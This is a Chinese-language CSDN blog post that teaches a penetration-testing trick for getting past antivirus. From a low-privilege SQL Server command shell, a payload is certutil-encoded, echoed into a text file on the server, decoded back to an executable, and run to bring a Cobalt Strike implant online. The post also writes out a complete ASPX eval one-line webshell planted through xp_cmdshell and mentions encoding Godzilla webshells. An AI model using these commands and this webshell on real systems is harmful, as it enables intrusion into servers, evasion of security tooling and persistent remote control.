shell 写入文件_文件上传的一个骚操作(低权限+bypassAV)

最新推荐文章于 2023-06-01 23:07:56 发布
最新推荐文章于 2023-06-01 23:07:56 发布
阅读量407 收藏 1
点赞数
文章标签: shell 写入文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39976499/article/details/113317439
版权

f78fa44e35cfd14944ca70fc2cf936c4.png

各位在渗透中是否遇见过这个问题:

虽然有低权限命令shell,如mssql、postgres等,执行下载总是各种无权限或者被AV杀,轻则无法继续渗透,重则弹出拦截消息,管理员上机后立马发现。

本文将介绍一种使用windows自带工具进行编码,写入编码数据到TXT文本最后再解码的骚操作。

话不多说,例如这样场景:在数据库连接后或者sqlmap注入连接os-shell后可执行命令:

bd8850286ff4cc4e4b3a33492ce8b03a.png

其中包括杀软或某狗、某盾:

309ad7eb023df1e730778a26c748663f.png

此时下载文件的各种命令均被拦截:

92d42a8b9057eaf16da4e5322c8debf3.png

bitsadmin:

8799095541ffc821ac3c923b8dd7769d.png

certutil证书:

152ebb68f8018db2547465f141b9ce44.png

还会被杀软报警:

ea6cd8351e272764c24ff7e357c8426a.png

powershell也会被彻底封杀:

59a18956f17d4301190d4aa250ca71d9.png

尤其是某管家,拦截更彻底,根本没有倒计时自动消失(此时需要夸一下某大厂的报警提示倒计时功能)

而在这种环境下可在有权限写入的前提下尝试写入一句话木马:

xp_cmdshell 'echo  ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["bmfx"], "unsafe");%^>> D:WWWbmfx.aspx'

但也存在被某狗、WAF杀掉的可能。

此时,骚操作上场。

windows自带的证书下载,也就是上文使用但远程下载被拦截的Certutil,还可用来对文件编码解码:

本地:
Certutil -encode artifact.txt artifact.exe

或指定路径:
Certutil -encode d:artifact.txt d:artifact.exe

94e6b3fd53f327090f37ffa4691940da.png

将txt文本使用echo命令:

echo sfAFASFAsfasgasdf………>>d:1.txt

写入服务器后,进入txt所在目录执行解码(或直接指定物理目录文件):

Certutil -decode art.txt art.exe
或:
Certutil -decode d:art.txt d:art.exe

4d8c13c5edec6b4960720e5d9c0bf23d.png

后续可在命令中执行exe上线:

cmd.exe /c art.exe

重点是:本地解码编码操作不会触发杀软拦截行为!

此外,Certutil支持将任意文件编码解码,除了exe还有aspx、php、jsp等(如加密免杀的webshell,此处使用哥斯拉为例):

9fe10beaa8db6f769f111df904006dc9.png

可在web站点写入文件后访问txt查看写入有无偏差:

e73911facad1b14c30bc69d57aa2852b.png

还有一点,本人亲测,编码后txt中的文本类似于生成的shellcode,会自动换行显示,但本地替换换行符、自行拆分换行符,不改变内容的前提下,编码、解码前后的文件不会有任何影响。

但是在navicat等数据库软件里操作的话还有一个限制,echo的长度会提示不要过长:

1523d1e3678e4eab59c66ba04ba5bd2e.png

此时就要看各位师傅们在bypass WaF、AV时如何减小体量了,一般cs的马bypass后会在50k左右,使用sqlmap的—os-shell执行echo不会像navicat要求128字符那么短,但也有长度限制,具体各位可亲测。

weixin_39976499
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一天一个shell命令 linux文件操作系列-ln命令详解
01-10
里提示一下:ubuntu的翻译很多都是字面直译,存在很多问题,所以建议大家参照我这里的解释。当然本来也是有些赶文的嫌疑,望指正。 经常在linux上操作,有在不同的目录下切换某几个固定的命令,或者修改几个固定的文件,这时候,如果能在一个目录下就操作他们,会是一件多么轻松的事情。我们来看看链接命令ln 全称 ln 全称是link 顾名思义,这是一个建立一个链接。怎么去理解呢?它的功能类似于Mac OS的别名或者Windows的快捷方式, 删除不会影响文件本身。 说明:(直接看看斜体,就行了) 链接可分为两种:硬链接(hard link)与软链接(symbolic link), 不论是那种类型的链
java_unix_shell.rar_java 模拟 shell_文件管理 java
09-19
用java写的unix文件管理模拟系统,可供需做此实验的大学生朋友参考
Shell脚本中调用、引用、包含另外一个脚本文件的两种方法
09-15
主要介绍了Shell脚本中调用、引用、包含另外一个脚本文件的两种方法,本文介绍的两种方法适合在当前目录下,需要的朋友可以参考下
Shell脚本中引用、调用另一个脚本文件的2种方法
09-15
主要介绍了Shell脚本中引用、调用另一个脚本文件的2种方法,本文介绍了两种方法的语法,然后给出实际使用实例和一些要注意的地方,需要的朋友可以参考下
Shell脚本一次读取文件中一行的2种写法
09-15
主要介绍了Shell脚本一次读取文件中一行的2种写法,本文还同时讲解了Shell读取文本文件的2种方法,需要的朋友可以参考下
Shell脚本读文件和写文件
最新发布
zhangbeizhen18的博客
06-01 3494
记录:439 场景:Shell脚本读文件和写文件。
Shell 脚本基础语法
苏谨
08-14 1090
usr/bin/bash 注意;#不是注释语法作用数组名 = (value1 vaule2)创建数组 并一次赋多个值数组名[索引值] = value给指定位置赋值。
日常知识点补漏:利用shell语言写入信息进文件
qq_52572989的博客
12-17 4311
1.第一种,单行输入 echo "21124" >> "test.txt" 2.第二种,多行输入 格式:cat <<EOF > filename 内容 EOF 其中,一个>表示覆盖,两个>>表示添加,EOF是首尾,第一个EOF所在行不会写入文件 cat <<EOF > test.txt wqdqwfwq fqwfq wqffwfq.;l; EOF cat test.txt ...
shell 写文件写入内容
石宗昊的博客
04-29 9777
脚本内容如下 sudo cat>/root/test.txt <<END 写入内容 END
使用xshell上传文件
shejiataoBlog
01-10 4万+
一.xshell连接Linux主机 1.选择新建会话 2.填写远程公网IP 3.填写用户名 4.填写连接密码 连接完成状态: 二.上传文件 1.安装rz命令 输入rz命令,看是否已经安装了lrzsz 如果没有安装则执行下方命令进行安装 # yum -y install lrzsz 2.确认是否正确安装 安装成功后,输入rpm命令确认是否正确安装 # rpm -qa lrzsz 3.上传本地文件 使用 #rz -y命令进行文件上传,此时会弹出上传的窗口: #rz -y 4.成功页面
HDFS 基本 shell 操作
皮埃尔的博客
11-15 6272
HDFS 基本 shell 操作
Shell脚本入门(十二) - 将数据写入文件
热门推荐
什么是江湖?
10-23 6万+
今天我们来看一下怎样将数据写入文件
Linux下使用Shell脚本实现FTP自动上传和下载文件
D的博客
08-04 8998
这个脚本是本次测试的从本地上传文件到远程 ftp 服务器。本地文件路径:/home/diffFile.txt。FTP路径:/ftphome/uploadData。本地路径:/local/getUploadData。FTP服务器:192.168.169.141。FTP路径:/var/ftp/write。FTP服务器:192.168.0.199。FTP服务器:192.168.0.199。FTP路径:/ftphome/data。将文件从FTP下载到本地的脚本如下。本地路径:/local/data。...
linux下用shell脚本实现sftp文件上传
weixin_42952472的博客
03-09 5083
先实现文件上传,文件下载过后在和大家分享。先把代码贴出来,亲测可用的,你们用需要改一些用户名,密码,待上传文件目录、sftp目录等。 #!/bin/bash #SFTP配置信息 #用户名 USER=jijian #密码 PASSWORD=jj #待上传文件根目录 SRCDIR=/home/databackup #SFTP目录 DESDIR=/home/jijian #IP IP=10.2.5.142 #端口 PORT=22 #获取文件 cd ${SRCDIR} ; #目录下的所有文件 #FILES=`ls
shell写入文件_SQL语句利用日志写shell
weixin_39774219的博客
12-18 319
outfile被禁止,或者写入文件被拦截;在数据库中操作如下:(必须是root权限)show variables like '%general%'; #查看配置set global general_log = on; #开启general log模式set global general_log_file = '/var/www/html/1.php'; #设置日志目录为shell...
Shell脚本常用命令及如何通过shell脚本实现服务器上文件的上传和下载
longerqingqia22的博客
02-19 3885
Shell一个用 C 语言编写的应用程序,这个应用程序提供了一个界面,用户通过这个界面访问操作系统内核的服务。Shell 脚本(shell script),是一种为 shell 编写的脚本程序,扩展名为.sh。
shell进入目录与写入文件的几种方法
windowsworld的博客
12-07 9125
shell进入目录 [root@localhost shell]# vim base.sh [root@localhost shell]# cat base.sh #!/usr/bin/env bash basedir=`cd $(dirname $0); pwd -P` echo $basedir base1=`cd ..;pwd` echo $base1 #$()与``作用一样,用于shell...
windows 反弹shell_怎么反弹shell(reverse shell
weixin_39956451的博客
11-19 2092
在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。我们先来讲一下什么是正向连接和反向连接。正向连接:我们本机去连接目标机器,比如ssh和mstsc反向连接:目标机器去连接我们本机那么为什么反向连接会比较常用呢目标机器处在局域网内,我们正向连不上他目标机器是动态ip目标机器存在防火墙然后说一下我的实验环境虚拟机采用nat模式攻击机:Kali Linux :...
linux上传文件到百度云盘(使用shell脚本,不依赖python库)
zhaojiyuan1024的博客
06-26 6842
linux上传文件到百度云盘(使用shell脚本) 自动上传文件到百度云百度云网盘 shell脚本上传文件到百度云网盘 定时备份文件到百度云网盘 实现利用Linux shell脚本来直接上传本地文件到百度云盘
怎么把shell命令的回显写入另一个文件,另一个文件没有写权限
05-25
你可以使用重定向符号 `>` 将命令的输出重定向到另一个文件中,例如: ``` command > /path/to/another-file ``` 这将把 `command` 命令的输出写入 `/path/to/another-file` 文件中。如果你没有权限写入这个文件,可以使用 `sudo` 命令以管理员权限执行该命令: ``` sudo command > /path/to/another-file ``` 这样就可以将命令的输出写入 `/path/to/another-file` 文件中了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值